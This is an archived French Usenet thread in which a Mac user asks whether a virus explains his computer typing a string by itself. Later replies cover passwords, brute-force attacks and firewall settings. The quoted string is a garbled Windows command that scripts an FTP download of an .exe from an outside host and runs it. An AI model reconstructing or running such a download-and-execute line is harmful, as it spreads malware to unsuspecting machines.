Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Un Virus ?

92 réponses
Avatar
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :


(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

10 réponses

6 7 8 9 10
Avatar
Nicolas.MICHEL
Gerald wrote:

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !


Sauf que le passwd donné est totalement imbitable.
Encore plus qu'avec pwgen, lequel génère une longue liste dont au moins
un mot de passe nous évoque quelque chose.

Et comme tu le dis plus bas c'est viable si on en change pas trop
souvent alors que justement il faudrait changer régulièrement le passwd.

Pour répondre à Nina, ici on a des attaques en bruteforce, mais

- soit ça provenait de machines en dmz mal sécurisées et déjà hackées et
qui attaquaient notre contrôleur, on le vois très vite parce que 80% des
users sont "locked out"

- soit ça provient de l'extérieur sur nos serveurs linux, et là ça
attaque surtout en ssh le compte root qui de toutes façon est désactivé
en ssh.

Donc perso je concidère que si le mot de passe est
- absent du dico
- alpha-numérique avec majuscules-minuscules
- mémorisable humainement parlant
- changé régulièrement
- qu'il ne traine pas sur un post-it ou sur un scotch colé à l'écran
mais qu'il se trouve dans un fichier crypté et bien plaçé

Alors le niveau de sécurité me semble acceptable en regard de notre
niveau de sécurité général de la boite. (notament les grandes baies
vitrées qu'un bon gros caillou casse plus vite que n'importe quel soft
de bruteforce, l'absence de sécuritas, l'absence de documents hautements
confidentiels ... )

Bref, même la parano a des limites.
--
Nicolas

Avatar
Nicolas.MICHEL
Nina Popravka wrote:

On Mon, 5 Mar 2007 10:41:14 +0100, (Nicolas
MICHEL) wrote:

Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
défaut un utilisateur "admin" sans mots de passe ?
Non accessible de l'extérieur, mais il est vrai que ça facilite

furieusement les intrusions physiques :-)))))


Euh, vraiment pas accessible ?
Même par les shares d'administrations ? (net use, c: ... )

Et quand bien même, est-ce que le système te prompt du genre
"attention, vous êtes en train d'activer un partage alors que vous
n'avez toujours pas mis de mot de passe admin" ?

Bon, pour le coup du "j'ai oublié mon mot de passe", c'est hachement
sécure. Ce qui me frappe quand on discute avec des convaincus de M$,
c'est que pour eux les machines hackées, les virus, backdoor et autres
sont tout à fait normal, ça fait partie de leur quotidien et ils n'y
font plus attention. C'est une fatalité, tout comme la future panne de
mon disque dur et on s'en protège comme on peux, par des backup et
autres.


--
Nicolas


Avatar
Nicolas.MICHEL
RiGuad wrote:

Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
préxistants


Ainsi donc NetBArrier ne fait rien de plus que le coupe feu du Mac ,
sinon qu'il presente les choses de maniere différente ?


Bloquer le trafic UDP (sauf su on faot du P2P)


UDP signifie t-il le trafic "Entrant" ?


Non
D'habitudes on parles toujours du TCP/IP mais il existe 3 protocoles
tcp/ip (voir plus ?) : tcp, udp et icmp.

http://fr.wikipedia.org/wiki/UDP
http://fr.wikipedia.org/wiki/ICMP

Le icmp sert à des procédures de contrôle, pas d'échange de données à
proprement parler. (c'est pas conçu pour envoyer ton powerpoint)

Par contre on doit pouvoir le faire en udp.
Donc perso je règle le icmp globalement alors que je règle de tcp et
l'udp port par port, avec quelques finesses suplémentaires suivant les
cas.

Activer la conservation
de l'historique du coupe-feu et Activer le mode furtif


Furtif signifie t il qu'on ne repond pas aux Ping ?


C'est pas vraiment un terme technique, donc peut-être bien que oui,
peut-être bien que non. ça pourrait être le bloquage du icmp, si ça se
trouve. (donc du ping)


--
Nicolas


Avatar
Nicolas.MICHEL
Nina Popravka wrote:

Faut aussi voir le niveau technique souvent plus que lamentable...
Un XP ou 2003 bien tenu ne court pas plus de risques à sortir dans le
monde sans capotes que, je sais pas, un Solaris, par exemple :-)))
Peut-être même moins...


C'est la diférence entre la théorie et la pratique qui me gêne.

Il y avait ce gag, d'un père instruisant son fils sur la signification
du mot "théorie":
Il demande à sa femme si pour un million de dolars, elle coucherait avec
un inconnu. Elle hésite, puis à 2 million elle finit par dire que oui,
elle accepterait.
Alors le père dit à son fils :
"Tu vois, c'est très simple.
En théorie, on est riche, en pratique ta mère est une saloppe."

Dans le même ordre d'idée, en théorie xp peut être bien tennu,
en pratique on a une 20aine de pc infecté en permanance sur notre petit
réseau à nous qu'on a.

Et pourtant ici on est dans un réseau universitaire, avec donc en
théorie les gens les plus intelligeants qu'il y ait.
Bin je peux t'afirmer qu'avoir un doctora en poche empêche nullement
d'utiliser un compte pop sans ssl et sans soucis.
Même les "pro" de l'informatique, s'en prennent plein la geulle, et que
je retourne ton linux par ci, et que je prennes ton "SQL Server" en
levrette par là, ...
Même pour un informaticien compétant, si t'est pas "spécialisé" en
sécurité tu te fais avoir un jour ou l'autre. Et parfois, c'est même pas
de ta faute mais t'est dedant quand même.

--
Nicolas

Avatar
pdorange
Nicolas MICHEL wrote:

[...]
Même pour un informaticien compétant, si t'est pas "spécialisé" en
sécurité tu te fais avoir un jour ou l'autre. Et parfois, c'est même pas
de ta faute mais t'est dedant quand même.


Y'a tout de même un moyen simple de se protéger sans efforts avec
windows : en entreprise tu donnes un coup de ciseau dans le cable réseau
à ça résoudra tout les problèmes de sécurités (sur les vieux PC il
convient aussi d'arracher le lecteurs de disquettes ou plus subtil de la
remplir de force avec 10 disquettes).
A la maison il suffit d'arrêté de payer son abonnement internet, et les
problèmes disparaitront d'eux même...
--
Pierre-Alain Dorange

Vidéo, DV et QuickTime <http://www.garage-video.com/>
Clarus, the DogCow <http://clarus.chez.tiscali.fr/>

Avatar
laurent.pertois
patpro ~ patrick proniewski wrote:

c'est ici que ca va finir par ressembler à Meetic, faites gaffe :)


Meuh, non, on ne fait qu'échanger des vieilleries, une sorte d'ebay
mélangé à du SEL.

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.

Avatar
laurent.pertois
Nina Popravka wrote:

Oui, t'as raison, eux, ils peuvent encore servir :-)


Voilà, je te le laisse, il pourrait te manquer et il encombrerait mon
étagère entre l'AIX de l'ANS et l'AU/X.

Y a les machines compatibles et des fonctionnalités encore
actuelles...


Y a encore des drivers ?

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.

Avatar
laurent.pertois
Nina Popravka wrote:

On Tue, 06 Mar 2007 10:04:52 +0100, Christophe Cuq
wrote:

La consultation de ce site devrait être remboursée par la sécurité
sociale comme anti-dépresseur :)


C'est un lieu de perdition, en fait, ils arrêtent pas de parler de cul
:-)


Ben, euh, non, pas toujours... enfin, parfois ils parlent aussi
d'informatique :-)

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.


Avatar
laurent.pertois
Nina Popravka wrote:

On Tue, 6 Mar 2007 19:34:51 +0100,
(Laurent Pertois) wrote:

Y a encore des drivers ?


Bah, j'ai encore des vieux Proliant à la maison comme tables basses,
keske tu crois :-) (et quand ça ventile, c'est pô rien)


Ah chic effectivement.

Blague à part, j'ai fait passer NT4 sur du PIV.


Bah, pour le proc, je ne m'inquiète pas trop, c'est plutôt côté vidéo et
autres trucs usb, mais bon, en cherchant, on doit y arriver :)

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.


Avatar
patpro ~ patrick proniewski
In article <1hukoxi.1y72rxco8bc1qN%,
(Laurent Pertois) wrote:

Blague à part, j'ai fait passer NT4 sur du PIV.


Bah, pour le proc, je ne m'inquiète pas trop, c'est plutôt côté vidéo et
autres trucs usb, mais bon, en cherchant, on doit y arriver :)


oui, mais doit-on ? :)

patpro

--
http://www.patpro.net/


6 7 8 9 10